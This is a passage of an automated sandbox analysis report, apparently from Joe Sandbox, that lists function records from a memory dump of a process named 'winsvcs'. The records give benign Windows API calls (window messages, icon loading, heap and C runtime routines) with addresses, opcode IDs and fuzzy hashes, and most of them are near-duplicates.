                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00411F02
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 513923721-0
                                                                                                                                                                                                                          • Opcode ID: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
                                                                                                                                                                                                                          • Instruction ID: f482abc3086895b13e65d7ed397f34a26d7f9aa96c4cf6a1d5cca4a790af85b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02212775508100EFCB008F18D984956BFB1FF98321B2486A6FD599A3BAC335DD52DB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042BBEA
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0042BC0A
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0042BC1A
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0042BC37
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00449610), ref: 0042BC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                          • Opcode ID: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
                                                                                                                                                                                                                          • Instruction ID: 52685b4dcb39849911ff3693f870a45c18f8edff1e4251c2b4a25b8dbaeea7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01A532B00A31ABDA10AB66B80634A7360EB00720F86401FE810B3380CB28AC81DBDD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2
                                                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                          • ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2714421763-0
                                                                                                                                                                                                                          • Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F637
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F64E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F656
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F670
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F686
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
                                                                                                                                                                                                                          • Instruction ID: a6e47eae5d4f7697fc9870831a46e4352dda564a31e996fcfd64f3f94e2429e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F037B4648300BFE3708B609C85FE777A9E784B01F109968F695966C0C6B458429B29
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5E8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5F8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F600
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F60C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F61B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
                                                                                                                                                                                                                          • Instruction ID: 429cbd9149b55361b38364805ecf70f412a373ee621004217eed38f5c464dd76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE042B1289614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA07
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA17
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA1F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA2B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA3A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
                                                                                                                                                                                                                          • Instruction ID: c72f6ad03f353f561a99e758367ef941d0c916186b8f8285fa4e34984247ba56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E042B1289614BAF65117B05C4EFFA362DAB14B02F106520F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5A0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5B0
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F5B8
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F5C4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F5D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
                                                                                                                                                                                                                          • Instruction ID: b6dd8b5b4e134736a0db0f6dc2b81ca2b1be5616f72a07522d348ec5361ba80b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE042B1289614BAF65117B05C4EFFA362DAB14B02F106421F792E95D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F9BF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F9CF
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F9D7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F9E3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
